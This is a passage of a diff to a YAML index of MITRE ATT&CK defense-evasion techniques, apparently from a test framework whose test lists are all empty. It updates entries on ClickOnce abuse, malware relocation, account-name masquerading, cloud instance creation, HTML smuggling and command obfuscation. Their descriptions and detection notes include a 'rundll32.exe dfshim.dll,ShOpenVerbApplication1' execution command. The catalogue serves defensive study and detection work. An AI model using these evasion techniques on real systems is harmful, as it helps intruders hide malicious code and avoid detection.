+        Because ClickOnce applications receive only limited permissions, they do not require administrative permissions to install.(Citation: Microsoft Learn ClickOnce) As such, adversaries may abuse ClickOnce to proxy execution of malicious code without needing to escalate privileges.
+
+        ClickOnce may be abused in a number of ways. For example, an adversary may rely on [User Execution](https://attack.mitre.org/techniques/T1204). When a user visits a malicious website, the .NET malware is disguised as legitimate software and a ClickOnce popup is displayed for installation.(Citation: NetSPI ClickOnce)
+
+        Adversaries may also abuse ClickOnce to execute malware via a [Rundll32](https://attack.mitre.org/techniques/T1218/011) script using the command `rundll32.exe dfshim.dll,ShOpenVerbApplication1`.(Citation: LOLBAS /Dfsvc.exe)
+
+        Additionally, an adversary can move the ClickOnce application file to a remote user’s startup folder for continued malicious code deployment (i.e., [Registry Run Keys / Startup Folder](https://attack.mitre.org/techniques/T1547/001)).(Citation: Burke/CISA ClickOnce BlackHat)(Citation: Burke/CISA ClickOnce Paper)
+      kill_chain_phases:
+      - kill_chain_name: mitre-attack
+        phase_name: defense-evasion
+      x_mitre_contributors:
+      - Wirapong Petshagun
+      x_mitre_deprecated: false
+      x_mitre_detection: ''
+      x_mitre_domains:
+      - enterprise-attack
+      x_mitre_is_subtechnique: true
+      x_mitre_platforms:
+      - Windows
+      x_mitre_version: '1.0'
+      x_mitre_data_sources:
+      - 'Process: Process Creation'
+      - 'Command: Command Execution'
+      - 'Process: Process Metadata'
+      - 'Module: Module Load'
+      x_mitre_system_requirements:
+      - ".NET Framework"
+      type: attack-pattern
+      id: attack-pattern--cc279e50-df85-4c8e-be80-6dc2eda8849c
+      created: '2024-09-09T14:39:28.637Z'
+      created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+      revoked: false
+      external_references:
+      - source_name: mitre-attack
+        url: https://attack.mitre.org/techniques/T1127/002
+        external_id: T1127.002
+      - source_name: LOLBAS /Dfsvc.exe
+        description: LOLBAS. (n.d.). /Dfsvc.exe. Retrieved September 9, 2024.
+        url: https://lolbas-project.github.io/lolbas/Binaries/Dfsvc/
+      - source_name: Microsoft Learn ClickOnce
+        description: Microsoft. (2023, September 14). ClickOnce security and deployment.
+          Retrieved September 9, 2024.
+        url: https://learn.microsoft.com/en-us/visualstudio/deployment/clickonce-security-and-deployment?view=vs-2022
+      - source_name: SpectorOps Medium ClickOnce
+        description: 'Nick Powers. (2023, June 7). Less SmartScreen More Caffeine:
+          (Ab)Using ClickOnce for Trusted Code Execution. Retrieved September 9, 2024.'
+        url: https://posts.specterops.io/less-smartscreen-more-caffeine-ab-using-clickonce-for-trusted-code-execution-1446ea8051c5
+      - source_name: NetSPI ClickOnce
+        description: Ryan Gandrud. (2015, March 23). All You Need Is One – A ClickOnce
+          Love Story. Retrieved September 9, 2024.
+        url: https://www.netspi.com/blog/technical-blog/adversary-simulation/all-you-need-is-one-a-clickonce-love-story/
+      - source_name: Burke/CISA ClickOnce Paper
+        description: William J. Burke IV. (n.d.). Appref-ms Abuse for  Code Execution
+          & C2. Retrieved September 9, 2024.
+        url: https://i.blackhat.com/USA-19/Wednesday/us-19-Burke-ClickOnce-And-Youre-In-When-Appref-Ms-Abuse-Is-Operating-As-Intended-wp.pdf?_gl=1*1jv89bf*_gcl_au*NjAyMzkzMjc3LjE3MjQ4MDk4OTQ.*_ga*MTk5OTA3ODkwMC4xNzI0ODA5ODk0*_ga_K4JK67TFYV*MTcyNDgwOTg5NC4xLjEuMTcyNDgwOTk1Ny4wLjAuMA..&_ga=2.256219723.1512103758.1724809895-1999078900.1724809894
+      - source_name: Burke/CISA ClickOnce BlackHat
+        description: 'William Joseph Burke III. (2019, August 7). CLICKONCE AND YOU’RE
+          IN: When .appref-ms abuse is operating as intended. Retrieved September
+          9, 2024.'
+        url: https://i.blackhat.com/USA-19/Wednesday/us-19-Burke-ClickOnce-And-Youre-In-When-Appref-Ms-Abuse-Is-Operating-As-Intended.pdf?_gl=1*16njas6*_gcl_au*NjAyMzkzMjc3LjE3MjQ4MDk4OTQ.*_ga*MTk5OTA3ODkwMC4xNzI0ODA5ODk0*_ga_K4JK67TFYV*MTcyNDgwOTg5NC4xLjEuMTcyNDgwOTk1Ny4wLjAuMA..&_ga=2.253743689.1512103758.1724809895-1999078900.1724809894
+      object_marking_refs:
+      - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
+      x_mitre_attack_spec_version: 3.2.0
+      x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+    atomic_tests: []
+  T1070.010:
+    technique:
+      modified: '2024-10-13T15:48:46.391Z'
+      name: Relocate Malware
+      description: |-
+        Once a payload is delivered, adversaries may reproduce copies of the same malware on the victim system to remove evidence of their presence and/or avoid defenses. Copying malware payloads to new locations may also be combined with [File Deletion](https://attack.mitre.org/techniques/T1070/004) to cleanup older artifacts.
+
+        Relocating malware may be a part of many actions intended to evade defenses. For example, adversaries may copy and rename payloads to better blend into the local environment (i.e., [Match Legitimate Name or Location](https://attack.mitre.org/techniques/T1036/005)).(Citation: DFIR Report Trickbot June 2023) Payloads may also be repositioned to target [File/Path Exclusions](https://attack.mitre.org/techniques/T1564/012) as well as specific locations associated with establishing [Persistence](https://attack.mitre.org/tactics/TA0003).(Citation: Latrodectus APR 2024)
+
+        Relocating malicious payloads may also hinder defensive analysis, especially to separate these payloads from earlier events (such as [User Execution](https://attack.mitre.org/techniques/T1204) and [Phishing](https://attack.mitre.org/techniques/T1566)) that may have generated alerts or otherwise drawn attention from defenders.
+      kill_chain_phases:
+      - kill_chain_name: mitre-attack
+        phase_name: defense-evasion
+      x_mitre_contributors:
+      - Matt Anderson, @‌nosecurething, Huntress
+      x_mitre_deprecated: false
+      x_mitre_detection: ''
+      x_mitre_domains:
+      - enterprise-attack
+      x_mitre_is_subtechnique: true
+      x_mitre_platforms:
+      - Linux
+      - macOS
+      - Windows
+      - Network
+      x_mitre_version: '1.0'
+      x_mitre_data_sources:
+      - 'File: File Modification'
+      type: attack-pattern
+      id: attack-pattern--cc36eeae-2209-4e63-89d3-c97e19edf280
+      created: '2024-05-31T11:07:57.406Z'
+      created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+      revoked: false
+      external_references:
+      - source_name: mitre-attack
+        url: https://attack.mitre.org/techniques/T1070/010
+        external_id: T1070.010
+      - source_name: Latrodectus APR 2024
+        description: 'Proofpoint Threat Research and Team Cymru S2 Threat Research.
+          (2024, April 4). Latrodectus: This Spider Bytes Like Ice . Retrieved May
+          31, 2024.'
+        url: https://www.proofpoint.com/us/blog/threat-insight/latrodectus-spider-bytes-ice
+      - source_name: DFIR Report Trickbot June 2023
+        description: The DFIR Report. (2023, June 12). A Truly Graceful Wipe Out.
+          Retrieved May 31, 2024.
+        url: https://thedfirreport.com/2023/06/12/a-truly-graceful-wipe-out/
+      object_marking_refs:
+      - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
+      x_mitre_attack_spec_version: 3.2.0
+      x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+    atomic_tests: []
   T1556.009:
     technique:
-      modified: '2024-04-18T20:53:46.175Z'
+      modified: '2024-09-16T16:54:47.595Z'
       name: Conditional Access Policies
       description: "Adversaries may disable or modify conditional access policies
         to enable persistent access to compromised accounts. Conditional access policies
         are additional verifications used by identity providers and identity and access
         management systems to determine whether a user should be granted access to
-        a resource.\n\nFor example, in Azure AD, Okta, and JumpCloud, users can be
+        a resource.\n\nFor example, in Entra ID, Okta, and JumpCloud, users can be
         denied access to applications based on their IP address, device enrollment
         status, and use of multi-factor authentication.(Citation: Microsoft Conditional
         Access)(Citation: JumpCloud Conditional Access Policies)(Citation: Okta Conditional
@@ -11673,10 +11929,9 @@ defense-evasion:
       - enterprise-attack
       x_mitre_is_subtechnique: true
       x_mitre_platforms:
-      - Azure AD
-      - SaaS
       - IaaS
-      x_mitre_version: '1.0'
+      - Identity Provider
+      x_mitre_version: '1.1'
       x_mitre_data_sources:
       - 'Active Directory: Active Directory Object Modification'
       - 'Cloud Service: Cloud Service Modification'
@@ -11713,40 +11968,10 @@ defense-evasion:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
       x_mitre_attack_spec_version: 3.2.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
     atomic_tests: []
   T1578.002:
     technique:
-      x_mitre_platforms:
-      - IaaS
-      x_mitre_domains:
-      - enterprise-attack
-      object_marking_refs:
-      - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
-      id: attack-pattern--cf1c2504-433f-4c4e-a1f8-91de45a0318c
-      type: attack-pattern
-      created: '2020-05-14T14:45:15.978Z'
-      created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      external_references:
-      - source_name: mitre-attack
-        external_id: T1578.002
-        url: https://attack.mitre.org/techniques/T1578/002
-      - source_name: Mandiant M-Trends 2020
-        url: https://content.fireeye.com/m-trends/rpt-m-trends-2020
-        description: Mandiant. (2020, February). M-Trends 2020. Retrieved April 24,
-          2020.
-      - source_name: AWS CloudTrail Search
-        url: https://aws.amazon.com/premiumsupport/knowledge-center/cloudtrail-search-api-calls/
-        description: Amazon. (n.d.). Search CloudTrail logs for API calls to EC2 Instances.
-          Retrieved June 17, 2020.
-      - source_name: Azure Activity Logs
-        url: https://docs.microsoft.com/en-us/azure/azure-resource-manager/management/view-activity-logs
-        description: Microsoft. (n.d.). View Azure activity logs. Retrieved June 17,
-          2020.
-      - source_name: Cloud Audit Logs
-        url: https://cloud.google.com/logging/docs/audit#admin-activity
-        description: Google. (n.d.). Audit Logs. Retrieved June 1, 2020.
-      modified: '2022-04-25T14:00:00.188Z'
+      modified: '2024-09-30T13:28:37.416Z'
       name: Create Cloud Instance
       description: |-
         An adversary may create a new instance or virtual machine (VM) within the compute service of a cloud account to evade defenses. Creating a new instance may allow an adversary to bypass firewall rules and permissions that exist on instances currently residing within an account. An adversary may [Create Snapshot](https://attack.mitre.org/techniques/T1578/001) of one or more volumes in an account, create a new instance, mount the snapshots, and then apply a less restrictive security policy to collect [Data from Local System](https://attack.mitre.org/techniques/T1005) or for [Remote Data Staging](https://attack.mitre.org/techniques/T1074/002).(Citation: Mandiant M-Trends 2020)
@@ -11755,20 +11980,50 @@ defense-evasion:
       kill_chain_phases:
       - kill_chain_name: mitre-attack
         phase_name: defense-evasion
+      x_mitre_contributors:
+      - Arun Seelagan, CISA
+      x_mitre_deprecated: false
       x_mitre_detection: |-
         The creation of a new instance or VM is a common part of operations within many cloud environments. Events should then not be viewed in isolation, but as part of a chain of behavior that could lead to other activities. For example, the creation of an instance by a new user account or the unexpected creation of one or more snapshots followed by the creation of an instance may indicate suspicious activity.
 
         In AWS, CloudTrail logs capture the creation of an instance in the <code>RunInstances</code> event, and in Azure the creation of a VM may be captured in Azure activity logs.(Citation: AWS CloudTrail Search)(Citation: Azure Activity Logs) Google's Admin Activity audit logs within their Cloud Audit logs can be used to detect the usage of <code>gcloud compute instances create</code> to create a VM.(Citation: Cloud Audit Logs)
+      x_mitre_domains:
+      - enterprise-attack
       x_mitre_is_subtechnique: true
-      x_mitre_version: '1.1'
-      x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+      x_mitre_platforms:
+      - IaaS
+      x_mitre_version: '1.2'
       x_mitre_data_sources:
       - 'Instance: Instance Creation'
       - 'Instance: Instance Metadata'
-      x_mitre_permissions_required:
-      - User
-      spec_version: '2.1'
-      x_mitre_attack_spec_version: 2.1.0
+      type: attack-pattern
+      id: attack-pattern--cf1c2504-433f-4c4e-a1f8-91de45a0318c
+      created: '2020-05-14T14:45:15.978Z'
+      created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+      revoked: false
+      external_references:
+      - source_name: mitre-attack
+        url: https://attack.mitre.org/techniques/T1578/002
+        external_id: T1578.002
+      - source_name: AWS CloudTrail Search
+        description: Amazon. (n.d.). Search CloudTrail logs for API calls to EC2 Instances.
+          Retrieved June 17, 2020.
+        url: https://aws.amazon.com/premiumsupport/knowledge-center/cloudtrail-search-api-calls/
+      - source_name: Cloud Audit Logs
+        description: Google. (n.d.). Audit Logs. Retrieved June 1, 2020.
+        url: https://cloud.google.com/logging/docs/audit#admin-activity
+      - source_name: Mandiant M-Trends 2020
+        description: Mandiant. (2020, February). M-Trends 2020. Retrieved April 24,
+          2020.
+        url: https://www.mandiant.com/sites/default/files/2021-09/mtrends-2020.pdf
+      - source_name: Azure Activity Logs
+        description: Microsoft. (n.d.). View Azure activity logs. Retrieved June 17,
+          2020.
+        url: https://docs.microsoft.com/en-us/azure/azure-resource-manager/management/view-activity-logs
+      object_marking_refs:
+      - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
+      x_mitre_attack_spec_version: 3.2.0
+      x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
     atomic_tests: []
   T1055.009:
     technique:
@@ -11798,7 +12053,7 @@ defense-evasion:
         url: http://man7.org/linux/man-pages/man1/dd.1.html
         description: Kerrisk, M. (2020, February 2). DD(1) User Commands. Retrieved
           February 21, 2020.
-      modified: '2021-04-29T14:49:39.188Z'
+      modified: '2020-06-20T22:25:55.331Z'
       name: Proc Memory
       description: "Adversaries may inject malicious code into processes via the /proc
         filesystem in order to evade process-based defenses as well as possibly elevate
@@ -11841,8 +12096,6 @@ defense-evasion:
       x_mitre_defense_bypassed:
       - Application control
       - Anti-virus
-      spec_version: '2.1'
-      x_mitre_attack_spec_version: 2.1.0
     atomic_tests: []
   T1601.001:
     technique:
@@ -11889,7 +12142,7 @@ defense-evasion:
         url: https://tools.cisco.com/security/center/resources/integrity_assurance.html#13
         description: Cisco. (n.d.). Cisco IOS Software Integrity Assurance - Cisco
           IOS Run-Time Memory Integrity Verification. Retrieved October 19, 2020.
-      modified: '2021-04-29T14:49:39.188Z'
+      modified: '2020-10-22T17:50:46.560Z'
       name: Patch System Image
       description: "Adversaries may modify the operating system of a network device
         to introduce new capabilities or weaken existing defenses.(Citation: Killing
@@ -11955,12 +12208,10 @@ defense-evasion:
       - 'File: File Modification'
       x_mitre_permissions_required:
       - Administrator
-      spec_version: '2.1'
-      x_mitre_attack_spec_version: 2.1.0
     atomic_tests: []
   T1070.009:
     technique:
-      modified: '2023-05-09T14:00:00.188Z'
+      modified: '2023-04-11T22:30:01.227Z'
       name: Clear Persistence
       description: |-
         Adversaries may clear artifacts associated with previously established persistence on a host system to remove evidence of their activity. This may involve various actions, such as removing services, deleting executables, [Modify Registry](https://attack.mitre.org/techniques/T1112), [Plist File Modification](https://attack.mitre.org/techniques/T1647), or other methods of cleanup to prevent defenders from collecting evidence of their persistent presence.(Citation: Cylance Dust Storm) Adversaries may also delete accounts previously created to maintain persistence (i.e. [Create Account](https://attack.mitre.org/techniques/T1136)).(Citation: Talos - Cisco Attack 2022)
@@ -12015,33 +12266,84 @@ defense-evasion:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
       x_mitre_attack_spec_version: 3.1.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
     atomic_tests: []
-  T1556.001:
+  T1036.010:
     technique:
-      x_mitre_platforms:
-      - Windows
+      modified: '2024-10-17T15:20:36.705Z'
+      name: Masquerade Account Name
+      description: "Adversaries may match or approximate the names of legitimate accounts
+        to make newly created ones appear benign. This will typically occur during
+        [Create Account](https://attack.mitre.org/techniques/T1136), although accounts
+        may also be renamed at a later date. This may also coincide with [Account
+        Access Removal](https://attack.mitre.org/techniques/T1531) if the actor first
+        deletes an account before re-creating one with the same name.(Citation: Huntress
+        MOVEit 2023)\n\nOften, adversaries will attempt to masquerade as service accounts,
+        such as those associated with legitimate software, data backups, or container
+        cluster management.(Citation: Elastic CUBA Ransomware 2022)(Citation: Aquasec
+        Kubernetes Attack 2023) They may also give accounts generic, trustworthy names,
+        such as “admin”, “help”, or “root.”(Citation: Invictus IR Cloud Ransomware
+        2024) Sometimes adversaries may model account names off of those already existing
+        in the system, as a follow-on behavior to [Account Discovery](https://attack.mitre.org/techniques/T1087).
+        \ \n\nNote that this is distinct from [Impersonation](https://attack.mitre.org/techniques/T1656),
+        which describes impersonating specific trusted individuals or organizations,
+        rather than user or service account names.  "
+      kill_chain_phases:
+      - kill_chain_name: mitre-attack
+        phase_name: defense-evasion
+      x_mitre_contributors:
+      - Menachem Goldstein
+      x_mitre_deprecated: false
+      x_mitre_detection: ''
       x_mitre_domains:
       - enterprise-attack
-      object_marking_refs:
-      - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
-      id: attack-pattern--d4b96d2c-1032-4b22-9235-2b5b649d0605
+      x_mitre_is_subtechnique: true
+      x_mitre_platforms:
+      - Linux
+      - macOS
+      - Windows
+      - SaaS
+      - IaaS
+      - Containers
+      - Office Suite
+      - Identity Provider
+      x_mitre_version: '1.0'
+      x_mitre_data_sources:
+      - 'User Account: User Account Creation'
       type: attack-pattern
-      created: '2020-02-11T19:05:02.399Z'
+      id: attack-pattern--d349c66e-18e1-4d8b-a2d7-65af7cbd2ba0
+      created: '2024-08-05T21:39:16.274Z'
       created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+      revoked: false
       external_references:
       - source_name: mitre-attack
-        external_id: T1556.001
-        url: https://attack.mitre.org/techniques/T1556/001
-      - source_name: Dell Skeleton
-        description: Dell SecureWorks. (2015, January 12). Skeleton Key Malware Analysis.
-          Retrieved April 8, 2019.
-        url: https://www.secureworks.com/research/skeleton-key-malware-analysis
-      - url: https://technet.microsoft.com/en-us/library/dn487457.aspx
-        description: Microsoft. (2016, April 15). Audit Policy Recommendations. Retrieved
-          June 3, 2016.
-        source_name: TechNet Audit Policy
-      modified: '2022-04-25T14:00:00.188Z'
+        url: https://attack.mitre.org/techniques/T1036/010
+        external_id: T1036.010
+      - source_name: Elastic CUBA Ransomware 2022
+        description: Daniel Stepanic, Derek Ditch, Seth Goodwin, Salim Bitam, Andrew
+          Pease. (2022, September 7). CUBA Ransomware Campaign Analysis. Retrieved
+          August 5, 2024.
+        url: https://www.elastic.co/security-labs/cuba-ransomware-campaign-analysis
+      - source_name: Invictus IR Cloud Ransomware 2024
+        description: Invictus IR. (2024, January 11). Ransomware in the cloud. Retrieved
+          August 5, 2024.
+        url: https://www.invictus-ir.com/news/ransomware-in-the-cloud
+      - source_name: Huntress MOVEit 2023
+        description: John Hammond. (2023, June 1). MOVEit Transfer Critical Vulnerability
+          CVE-2023-34362 Rapid Response. Retrieved August 5, 2024.
+        url: https://www.huntress.com/blog/moveit-transfer-critical-vulnerability-rapid-response
+      - source_name: Aquasec Kubernetes Attack 2023
+        description: Michael Katchinskiy, Assaf Morag. (2023, April 21). First-Ever
+          Attack Leveraging Kubernetes RBAC to Backdoor Clusters. Retrieved July 14,
+          2023.
+        url: https://blog.aquasec.com/leveraging-kubernetes-rbac-to-backdoor-clusters
+      object_marking_refs:
+      - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
+      x_mitre_attack_spec_version: 3.2.0
+      x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+    atomic_tests: []
+  T1556.001:
+    technique:
+      modified: '2024-08-21T15:26:54.386Z'
       name: Domain Controller Authentication
       description: "Adversaries may patch the authentication process on a domain controller
         to bypass the typical authentication mechanisms and enable access to accounts.
@@ -12062,6 +12364,7 @@ defense-evasion:
         phase_name: defense-evasion
       - kill_chain_name: mitre-attack
         phase_name: persistence
+      x_mitre_deprecated: false
       x_mitre_detection: "Monitor for calls to <code>OpenProcess</code> that can be
         used to manipulate lsass.exe running on a domain controller as well as for
         malicious modifications to functions exported from authentication-related
@@ -12076,22 +12379,42 @@ defense-evasion:
         used to execute binaries on a remote system as a particular account. Correlate
         other security systems with login information (e.g. a user has an active login
         session but has not entered the building or does not have VPN access). "
+      x_mitre_domains:
+      - enterprise-attack
       x_mitre_is_subtechnique: true
-      x_mitre_version: '2.0'
-      x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+      x_mitre_platforms:
+      - Windows
+      x_mitre_version: '2.1'
       x_mitre_data_sources:
       - 'Logon Session: Logon Session Creation'
       - 'Process: Process Access'
       - 'File: File Modification'
       - 'Process: OS API Execution'
-      x_mitre_permissions_required:
-      - Administrator
-      spec_version: '2.1'
-      x_mitre_attack_spec_version: 2.1.0
+      type: attack-pattern
+      id: attack-pattern--d4b96d2c-1032-4b22-9235-2b5b649d0605
+      created: '2020-02-11T19:05:02.399Z'
+      created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+      revoked: false
+      external_references:
+      - source_name: mitre-attack
+        url: https://attack.mitre.org/techniques/T1556/001
+        external_id: T1556.001
+      - source_name: Dell Skeleton
+        description: Dell SecureWorks. (2015, January 12). Skeleton Key Malware Analysis.
+          Retrieved April 8, 2019.
+        url: https://www.secureworks.com/research/skeleton-key-malware-analysis
+      - source_name: TechNet Audit Policy
+        description: Microsoft. (2016, April 15). Audit Policy Recommendations. Retrieved
+          June 3, 2016.
+        url: https://technet.microsoft.com/en-us/library/dn487457.aspx
+      object_marking_refs:
+      - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
+      x_mitre_attack_spec_version: 3.2.0
+      x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
     atomic_tests: []
   T1027.006:
     technique:
-      modified: '2023-07-14T14:01:41.475Z'
+      modified: '2024-09-12T19:12:13.006Z'
       name: HTML Smuggling
       description: |-
         Adversaries may smuggle data and files past content filters by hiding malicious payloads inside of seemingly benign HTML files. HTML documents can store large binary objects known as JavaScript Blobs (immutable data that represents raw bytes) that can later be constructed into file-like objects. Data may also be stored in Data URLs, which enable embedding media type or MIME files inline of HTML documents. HTML5 also introduced a download attribute that may be used to initiate file downloads.(Citation: HTML Smuggling Menlo Security 2020)(Citation: Outlflank HTML Smuggling 2018)
@@ -12149,48 +12472,17 @@ defense-evasion:
         url: https://www.menlosecurity.com/blog/new-attack-alert-duri
       - source_name: nccgroup Smuggling HTA 2017
         description: Warren, R. (2017, August 8). Smuggling HTA files in Internet
-          Explorer/Edge. Retrieved May 20, 2021.
-        url: https://research.nccgroup.com/2017/08/08/smuggling-hta-files-in-internet-explorer-edge/
+          Explorer/Edge. Retrieved September 12, 2024.
+        url: https://www.nccgroup.com/us/research-blog/smuggling-hta-files-in-internet-exploreredge/
       object_marking_refs:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
-      x_mitre_attack_spec_version: 3.1.0
+      x_mitre_attack_spec_version: 3.2.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
       identifier: T1027.006
     atomic_tests: []
   T1556.005:
     technique:
-      x_mitre_platforms:
-      - Windows
-      x_mitre_domains:
-      - enterprise-attack
-      object_marking_refs:
-      - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
-      id: attack-pattern--d50955c2-272d-4ac8-95da-10c29dda1c48
-      type: attack-pattern
-      created: '2022-01-13T20:02:28.349Z'
-      created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      external_references:
-      - source_name: mitre-attack
-        external_id: T1556.005
-        url: https://attack.mitre.org/techniques/T1556/005
-      - source_name: store_pwd_rev_enc
-        url: https://docs.microsoft.com/en-us/windows/security/threat-protection/security-policy-settings/store-passwords-using-reversible-encryption
-        description: Microsoft. (2021, October 28). Store passwords using reversible
-          encryption. Retrieved January 3, 2022.
-      - source_name: how_pwd_rev_enc_1
-        url: http://blog.teusink.net/2009/08/passwords-stored-using-reversible.html
-        description: 'Teusink, N. (2009, August 25). Passwords stored using reversible
-          encryption: how it works (part 1). Retrieved November 17, 2021.'
-      - source_name: how_pwd_rev_enc_2
-        url: http://blog.teusink.net/2009/08/passwords-stored-using-reversible_26.html
-        description: 'Teusink, N. (2009, August 26). Passwords stored using reversible
-          encryption: how it works (part 2). Retrieved November 17, 2021.'
-      - source_name: dump_pwd_dcsync
-        url: https://adsecurity.org/?p=2053
-        description: Metcalf, S. (2015, November 22). Dump Clear-Text Passwords for
-          All Admins in the Domain Using Mimikatz DCSync. Retrieved November 15, 2021.
-      modified: '2022-05-11T14:00:00.188Z'
+      modified: '2024-08-26T15:40:31.871Z'
       name: Reversible Encryption
       description: |-
         An adversary may abuse Active Directory authentication encryption properties to gain access to credentials on Windows systems. The <code>AllowReversiblePasswordEncryption</code> property specifies whether reversible password encryption for an account is enabled or disabled. By default this property is disabled (instead storing user credentials as the output of one-way hashing functions) and should not be enabled unless legacy or other software require it.(Citation: store_pwd_rev_enc)
@@ -12212,6 +12504,7 @@ defense-evasion:
         phase_name: defense-evasion
       - kill_chain_name: mitre-attack
         phase_name: persistence
+      x_mitre_deprecated: false
       x_mitre_detection: "Monitor property changes in Group Policy: <code>Computer
         Configuration\\Windows Settings\\Security Settings\\Account Policies\\Password
         Policy\\Store passwords using reversible encryption</code>. By default, the
@@ -12222,23 +12515,50 @@ defense-evasion:
         Directory PowerShell modules, such as <code>Set-ADUser</code> and <code>Set-ADAccountControl</code>,
         that change account configurations. \n\nMonitor Fine-Grained Password Policies
         and regularly audit user accounts and group settings.(Citation: dump_pwd_dcsync)"
+      x_mitre_domains:
+      - enterprise-attack
       x_mitre_is_subtechnique: true
-      x_mitre_version: '1.0'
-      x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+      x_mitre_platforms:
+      - Windows
+      x_mitre_version: '1.1'
       x_mitre_data_sources:
       - 'Active Directory: Active Directory Object Modification'
       - 'Command: Command Execution'
       - 'User Account: User Account Metadata'
       - 'Script: Script Execution'
-      x_mitre_permissions_required:
-      - User
-      - Administrator
-      spec_version: '2.1'
-      x_mitre_attack_spec_version: 2.1.0
+      type: attack-pattern
+      id: attack-pattern--d50955c2-272d-4ac8-95da-10c29dda1c48
+      created: '2022-01-13T20:02:28.349Z'
+      created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+      revoked: false
+      external_references:
+      - source_name: mitre-attack
+        url: https://attack.mitre.org/techniques/T1556/005
+        external_id: T1556.005
+      - source_name: dump_pwd_dcsync
+        description: Metcalf, S. (2015, November 22). Dump Clear-Text Passwords for
+          All Admins in the Domain Using Mimikatz DCSync. Retrieved November 15, 2021.
+        url: https://adsecurity.org/?p=2053
+      - source_name: store_pwd_rev_enc
+        description: Microsoft. (2021, October 28). Store passwords using reversible
+          encryption. Retrieved January 3, 2022.
+        url: https://docs.microsoft.com/en-us/windows/security/threat-protection/security-policy-settings/store-passwords-using-reversible-encryption
+      - source_name: how_pwd_rev_enc_1
+        description: 'Teusink, N. (2009, August 25). Passwords stored using reversible
+          encryption: how it works (part 1). Retrieved November 17, 2021.'
+        url: http://blog.teusink.net/2009/08/passwords-stored-using-reversible.html
+      - source_name: how_pwd_rev_enc_2
+        description: 'Teusink, N. (2009, August 26). Passwords stored using reversible
+          encryption: how it works (part 2). Retrieved November 17, 2021.'
+        url: http://blog.teusink.net/2009/08/passwords-stored-using-reversible_26.html
+      object_marking_refs:
+      - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
+      x_mitre_attack_spec_version: 3.2.0
+      x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
     atomic_tests: []
   T1027.010:
     technique:
-      modified: '2023-05-09T14:00:00.188Z'
+      modified: '2024-09-12T19:43:18.873Z'
       name: Command Obfuscation
       description: |-
         Adversaries may obfuscate content during command execution to impede detection. Command-line obfuscation is a method of making strings and patterns within commands and scripts more difficult to signature and analyze. This type of obfuscation can be included within commands executed by delivered payloads (e.g., [Phishing](https://attack.mitre.org/techniques/T1566) and [Drive-by Compromise](https://attack.mitre.org/techniques/T1189)) or interactively via [Command and Scripting Interpreter](https://attack.mitre.org/techniques/T1059).(Citation: Akamai JS)(Citation: Malware Monday VBE)
@@ -12279,8 +12599,9 @@ defense-evasion:
         url: https://attack.mitre.org/techniques/T1027/010
         external_id: T1027.010
       - source_name: Twitter Richard WMIC
-        description: Ackroyd, R. (2023, March 24). Twitter. Retrieved March 24, 2023.
-        url: https://twitter.com/rfackroyd/status/1639136000755765254
+        description: Ackroyd, R. (2023, March 24). Twitter. Retrieved September 12,
+          2024.
+        url: https://x.com/rfackroyd/status/1639136000755765254
       - source_name: Invoke-Obfuscation
         description: Bohannon, D. (2016, September 24). Invoke-Obfuscation. Retrieved
           March 17, 2023.
@@ -12316,43 +12637,23 @@ defense-evasion:
         url: https://redcanary.com/threat-detection-report/techniques/powershell/
       object_marking_refs:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
-      x_mitre_attack_spec_version: 3.1.0
+      x_mitre_attack_spec_version: 3.2.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
     atomic_tests: []
   T1070.004:
     technique:
-      x_mitre_platforms:
-      - Linux
-      - macOS
-      - Windows
-      x_mitre_domains:
-      - enterprise-attack
-      x_mitre_contributors:
-      - Walker Johnson
-      object_marking_refs:
-      - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
-      type: attack-pattern
-      id: attack-pattern--d63a3fb8-9452-4e9d-a60a-54be68d5998c
-      created: '2020-01-31T12:35:36.479Z'
-      x_mitre_version: '1.1'
-      external_references:
-      - source_name: mitre-attack
-        external_id: T1070.004
-        url: https://attack.mitre.org/techniques/T1070/004
